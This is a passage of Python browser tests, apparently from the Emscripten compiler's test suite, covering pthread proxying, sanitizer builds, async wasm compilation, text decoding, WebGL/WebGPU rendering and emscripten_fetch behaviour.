self.btest(test_file('gauge_available_memory.cpp'), expected='1', args=['-sABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest_exit(test_file('pthread/test_pthread_run_on_main_thread_flood.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async(self):
self.btest_exit(test_file('pthread/call_async.c'), args=['-sUSE_PTHREADS'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js')])
self.btest_exit(test_file('pthread/call_sync_on_main_thread.c'), args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_sync_on_main_thread.js'), '-sEXPORTED_FUNCTIONS=_main,_malloc'])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-DPROXY_TO_PTHREAD=1', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-O3', '-sUSE_PTHREADS', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
self.btest(test_file('pthread/call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', test_file('pthread/call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
for args in [['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')], ['-O3']]:
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
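# Same as the test above, but with synchronous wasm compilation (-sWASM_ASYNC_COMPILATION=0).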
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
mem_init_modes = [[], ['--memory-init-file', '0'], ['--memory-init-file', '1']]
for mem_init_mode in mem_init_modes:
args = ['-sWASM_ASYNC_COMPILATION=0']
self.btest_exit(test_file('pthread/test_pthread_global_data_initialization.c'), args=args + mem_init_mode + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sPTHREAD_POOL_SIZE'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest_exit(test_file('pthread/test_pthread_clock_drift.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
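# Tests the UTF-8 string marshalling functions in pthread builds.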
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest_exit(test_file('pthread/test_pthread_utf8_funcs.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Test the emscripten_futex_wake(addr, INT_MAX); functionality to wake all waiters
@also_with_wasm2js
@requires_threads
def test_pthread_wake_all(self):
self.btest_exit(test_file('pthread/test_futex_wake_all.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sINITIAL_MEMORY=64MB'])
# Test that stack base and max correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest_exit(test_file('pthread/test_pthread_stack_bounds.cpp'), args=['-sUSE_PTHREADS'])
# Test that real `thread_local` works.
@requires_threads
def test_pthread_tls(self):
self.btest_exit(test_file('pthread/test_pthread_tls.cpp'), args=['-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@requires_threads
def test_pthread_tls_main(self):
self.btest_exit(test_file('pthread/test_pthread_tls_main.cpp'), args=['-sUSE_PTHREADS'])
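# Test that a stack overflow is detected and aborts when main() runs on a pthread (PROXY_TO_PTHREAD).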
@requires_threads
def test_pthread_safe_stack(self):
# Note that as the test runs with PROXY_TO_PTHREAD, we set TOTAL_STACK,
# and not DEFAULT_PTHREAD_STACK_SIZE, as the pthread for main() gets the
# same stack size as the main thread normally would.
self.btest(test_file('core/test_safe_stack.c'), expected='abort:stack overflow', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sSTACK_OVERFLOW_CHECK=2', '-sTOTAL_STACK=64KB'])
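# Test LSan (LeakSanitizer) in pthread builds, both with and without an actual leak.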
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
@no_firefox('https://github.com/emscripten-core/emscripten/issues/15978')
def test_pthread_lsan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-gsource-map']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(test_file('pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread', name + '.js')] + args)
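# Test that ASan detects a use-after-free in a pthread build.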
@requires_threads
def test_pthread_asan_use_after_free(self):
self.btest(test_file('pthread/test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free.js')])
@requires_threads
def test_pthread_asan_use_after_free_2(self):
# similar to test_pthread_asan_use_after_free, but using a pool instead
# of proxy-to-pthread, and also the allocation happens on the pthread
# (which tests that it can use the offset converter to get the stack
# trace there)
self.btest(test_file('pthread/test_pthread_asan_use_after_free_2.cpp'), expected='1', args=['-fsanitize=address', '-sINITIAL_MEMORY=256MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=1', '--pre-js', test_file('pthread/test_pthread_asan_use_after_free_2.js')])
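# Test that exiting the process from a pthread build with EXIT_RUNTIME reports the expected onExit status.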
@requires_threads
def test_pthread_exit_process(self):
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sPTHREAD_POOL_SIZE=2',
'-sEXIT_RUNTIME',
'-DEXIT_RUNTIME',
'-O0']
args += ['--pre-js', test_file('core/pthread/test_pthread_exit_runtime.pre.js')]
self.btest(test_file('core/pthread/test_pthread_exit_runtime.c'), expected='onExit status: 42', args=args)
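# Test that a trap (unreachable) on a pthread surfaces as an error event that the main thread can observe.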
@requires_threads
def test_pthread_trap(self):
create_file('pre.js', '''
if (typeof window === 'object' && window) {
window.addEventListener('error', function(e) {
if (e.error && e.error.message.includes('unreachable'))
maybeReportResultToServer("expected exception caught");
else
maybeReportResultToServer("unexpected: " + e);
});
}''')
args = ['-sUSE_PTHREADS',
'-sPROXY_TO_PTHREAD',
'-sEXIT_RUNTIME',
'--profiling-funcs',
'--pre-js=pre.js']
self.btest(test_file('pthread/test_pthread_trap.c'), expected='expected exception caught', args=args)
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
def test_main_thread_em_asm_signatures(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=[])
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest_exit(test_file('core/test_em_asm_signatures.cpp'), assert_returncode=121, args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_async_em_asm(self):
self.btest_exit(test_file('core/test_main_thread_async_em_asm.cpp'), args=['-O3', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sASSERTIONS'])
@requires_threads
def test_main_thread_em_asm_blocking(self):
create_file('page.html', read_file(test_file('browser/test_em_asm_blocking.html')))
self.compile_btest([test_file('browser/test_em_asm_blocking.cpp'), '-O2', '-o', 'wasm.js', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
self.run_browser('page.html', '', '/report_result?8')
# Test that it is possible to send a signal via calling alarm(timeout), which in turn invokes the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest_exit(test_file('test_sigalrm.c'), args=['-O3'])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', test_file('canvas_style_proxy_shell.html'), '--pre-js', test_file('canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(test_file('canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(test_file('custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', test_file('custom_messages_proxy_shell.html'), '--post-js', test_file('custom_messages_proxy_postjs.js')])
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-sWASM=0']
print('plain html')
self.compile_btest([test_file('in_flight_memfile_request.c'), '-o', 'test.js'] + opts)
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
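# Test that wasm compilation is asynchronous by default, and can be forced off with -sWASM_ASYNC_COMPILATION=0.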
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, returncode in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-sWASM_ASYNC_COMPILATION'], 1), # force it on
(['-O1', '-sWASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, returncode)
self.btest_exit('binaryen_async.c', assert_returncode=returncode, args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest_exit('binaryen_async.c', assert_returncode=1, args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
@parameterized({
'': ([],),
'asan': (['-fsanitize=address', '-sINITIAL_MEMORY=128MB'],)
})
def test_manual_wasm_instantiate(self, args=[]):
self.compile_btest([test_file('manual_wasm_instantiate.cpp'), '-o', 'manual_wasm_instantiate.js'] + args)
shutil.copyfile(test_file('manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
ensure_dir('cdn')
create_file('shell2.html', read_file(path_from_root('src/shell.html')).replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
self.compile_btest([test_file('browser_test_hello_world.c'), '--shell-file', 'shell2.html', '-o', 'test.html'])
shutil.move('test.wasm', Path('cdn/test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
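# Test UTF8ToString() on a large corpus (exercises the TextDecoder code path).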
@also_with_threads
def test_utf8_textdecoder(self):
self.btest_exit('benchmark_utf8.cpp', 0, args=['--embed-file', test_file('utf8_corpus.txt') + '@/utf8_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF8ToString]'])
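# Test the UTF-16 string conversion functions (UTF16ToString, stringToUTF16, lengthBytesUTF16).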
@also_with_threads
def test_utf16_textdecoder(self):
self.btest_exit('benchmark_utf16.cpp', 0, args=['--embed-file', test_file('utf16_corpus.txt') + '@/utf16_corpus.txt', '-sEXPORTED_RUNTIME_METHODS=[UTF16ToString,stringToUTF16,lengthBytesUTF16]'])
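# Compare the generated JS code size with -sTEXTDECODER=0/1/2.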
@also_with_threads
def test_TextDecoder(self):
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=0'])
just_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0')
td_with_fallback = os.path.getsize('test.js')
self.btest('browser_test_hello_world.c', '0', args=['-sTEXTDECODER=2'])
td_without_fallback = os.path.getsize('test.js')
# pthread TextDecoder support is more complex due to
# https://github.com/whatwg/encoding/issues/172
# and therefore the expected code size win there is actually a loss
if '-pthread' not in self.emcc_args:
self.assertLess(td_without_fallback, just_fallback)
else:
self.assertGreater(td_without_fallback, just_fallback)
self.assertLess(just_fallback, td_with_fallback)
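# Test that a minimal web-only build with Closure stays within a small absolute JS size.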
def test_small_js_flags(self):
self.btest('browser_test_hello_world.c', '0', args=['-O3', '--closure=1', '-sINCOMING_MODULE_JS_API=[]', '-sENVIRONMENT=web'])
# Check an absolute js code size, with some slack.
size = os.path.getsize('test.js')
print('size:', size)
# Note that this size includes test harness additions (for reporting the result, etc.).
self.assertLess(abs(size - 5500), 100)
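# A minimal sketch (hypothetical helper, not part of the suite) of the size-window check
# above, assuming the 5500-byte baseline and 100-byte slack used in test_small_js_flags:
def size_within_slack(size, baseline=5500, slack=100):
  # True when the measured size stays within +/- `slack` bytes of `baseline`.
  return abs(size - baseline) < slack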
# Tests that it is possible to initialize and render WebGL content in a pthread by using OffscreenCanvas.
# -DTEST_CHAINED_WEBGL_CONTEXT_PASSING: Tests that it is possible to transfer WebGL canvas in a chain from main thread -> thread 1 -> thread 2 and then init and render WebGL content there.
@no_chrome('see https://crbug.com/961765')
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
# Tests that it is possible to render WebGL content on a <canvas> on the main thread, after it has once been used to render WebGL content in a pthread first
# -DTEST_MAIN_THREAD_EXPLICIT_COMMIT: Test the same (WebGL on main thread after pthread), but by using explicit .commit() to swap on the main thread instead of implicit "swap when rAF ends" logic
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
@disabled('This test is disabled because current OffscreenCanvas does not allow transferring it after a rendering context has been created for it.')
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sOFFSCREENCANVAS_SUPPORT', '-lGL'])
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest_exit('gl_only_in_pthread.cpp', args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sOFFSCREEN_FRAMEBUFFER'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-sFULL_ES2=1'])
# Tests for WEBGL_multi_draw extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# you may want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env var.
@requires_graphics_hardware
def test_webgl_multi_draw(self):
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ARRAYS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS=1', '-DEXPLICIT_SWAP=1'])
self.btest('webgl_multi_draw_test.c', reference='webgl_multi_draw.png',
args=['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DMULTI_DRAW_ELEMENTS_INSTANCED=1', '-DEXPLICIT_SWAP=1'])
# Tests for base_vertex/base_instance extension
# For testing WebGL draft extensions like this, if using Chrome as the browser,
# you may want to append --enable-webgl-draft-extensions to the EMTEST_BROWSER env var.
# If testing on Mac, you also need --use-cmd-decoder=passthrough to get this extension.
# Also, there is a known bug with Mac Intel baseInstance which can fail to produce the expected image result.
@requires_graphics_hardware
def test_webgl_draw_base_vertex_base_instance(self):
for multiDraw in [0, 1]:
for drawElements in [0, 1]:
self.btest('webgl_draw_base_vertex_base_instance_test.c', reference='webgl_draw_instanced_base_vertex_base_instance.png',
args=['-lGL',
'-sMAX_WEBGL_VERSION=2',
'-sOFFSCREEN_FRAMEBUFFER',
'-DMULTI_DRAW=' + str(multiDraw),
'-DDRAW_ELEMENTS=' + str(drawElements),
'-DEXPLICIT_SWAP=1',
'-DWEBGL_CONTEXT_VERSION=2'])
@requires_graphics_hardware
def test_webgl_sample_query(self):
cmd = ['-sMAX_WEBGL_VERSION=2', '-lGL']
self.btest_exit('webgl_sample_query.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_timer_query(self):
for args in [
# EXT query entrypoints on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
# builtin query entrypoints on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2'],
# EXT query entrypoints on a WebGL 1.0 context while built for WebGL 2.0
['-sMAX_WEBGL_VERSION=2'],
]:
cmd = args + ['-lGL']
self.btest_exit('webgl_timer_query.cpp', args=cmd)
# Tests that -sOFFSCREEN_FRAMEBUFFER rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
# Tests all the different possible versions of libgl
for threads in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
for version in [[], ['-sFULL_ES2'], ['-sFULL_ES3']]:
args = ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1'] + threads + version
print('with args: %s' % str(args))
self.btest_exit('webgl_draw_triangle.c', args=args)
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest_exit('test_webgl_no_auto_init_extensions.c', args=['-lGL', '-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-sMAX_WEBGL_VERSION', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# VAO path on WebGL 1.0
['-sMAX_WEBGL_VERSION'],
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-sOFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-sOFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest_exit('webgl_offscreen_framebuffer_swap_with_bad_state.c', args=cmd)
# Tests that -sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest_exit('webgl_draw_triangle_with_uniform_color.c', args=['-lGL', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-sMAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@parameterized({
'': ([False],),
'asyncify': ([True],),
})
@requires_threads
@requires_offscreen_canvas
@requires_graphics_hardware
def test_webgl_offscreen_canvas_in_proxied_pthread(self, asyncify):
cmd = ['-sUSE_PTHREADS', '-sOFFSCREENCANVAS_SUPPORT', '-lGL', '-sGL_DEBUG', '-sPROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-sASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest_exit('gl_in_proxy_pthread.cpp', args=cmd)
@parameterized({
'proxy': (['-sPROXY_TO_PTHREAD'],),
'': ([],),
})
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self, args):
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-sOFFSCREENCANVAS_SUPPORT', '-sOFFSCREEN_FRAMEBUFFER']]:
cmd = args + args2 + args3 + ['-sUSE_PTHREADS', '-lGL', '-sGL_DEBUG']
print(str(cmd))
self.btest_exit('resize_offscreencanvas_from_main_thread.cpp', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-sMAX_WEBGL_VERSION=2',
'-sGL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-sGL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest_exit('webgl2_simple_enable_extensions.c', args=cmd)
@requires_graphics_hardware
def test_webgpu_basic_rendering(self):
for args in [[], ['-sASSERTIONS', '--closure=1'], ['-sMAIN_MODULE=1']]:
self.btest_exit('webgpu_basic_rendering.cpp', args=['-sUSE_WEBGPU'] + args)
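# Test that a WebGPU device can be requested (webgpu_get_device.cpp).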
def test_webgpu_get_device(self):
for args in [['-sASSERTIONS', '--closure=1']]:
self.btest_exit('webgpu_get_device.cpp', args=['-sUSE_WEBGPU'] + args)
# Tests the feature that the shell html page can preallocate the typed array and place it
# in Module.buffer before loading the script page.
# In this build mode, the -sINITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-sWASM=0', '-sINITIAL_MEMORY=16MB', '-sABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
@also_with_wasm2js
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-sFETCH_SUPPORT_INDEXEDDB=0']]:
self.btest_exit('fetch/to_memory.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'] + arg)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/from_thread.cpp',
args=args + ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD', '-sFETCH_DEBUG', '-sFETCH', '-DFILE_DOES_NOT_EXIST'],
also_wasm2js=True)
@also_with_wasm2js
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/to_indexeddb.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
@also_with_wasm2js
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/cached_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests that response headers get set on emscripten_fetch_t values.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/response_headers.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_fetch() usage to stream an XHR into memory without storing the full file in memory
@also_with_wasm2js
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest_exit('fetch/stream_file.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '-sINITIAL_MEMORY=536870912'])
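# Test that emscripten_fetch() reports when response headers have been received (fetch/headers_received.cpp).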
def test_fetch_headers_received(self):
self.btest_exit('fetch/headers_received.cpp', args=['-sFETCH_DEBUG', '-sFETCH'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -sPROXY_TO_PTHREAD option.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when the user passes none of the main 3 flags (append/replace/no_download).
# In that case, append is implicitly understood.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from a wasm pthread.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/example_synchronous_fetch.c', args=['-sFETCH', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
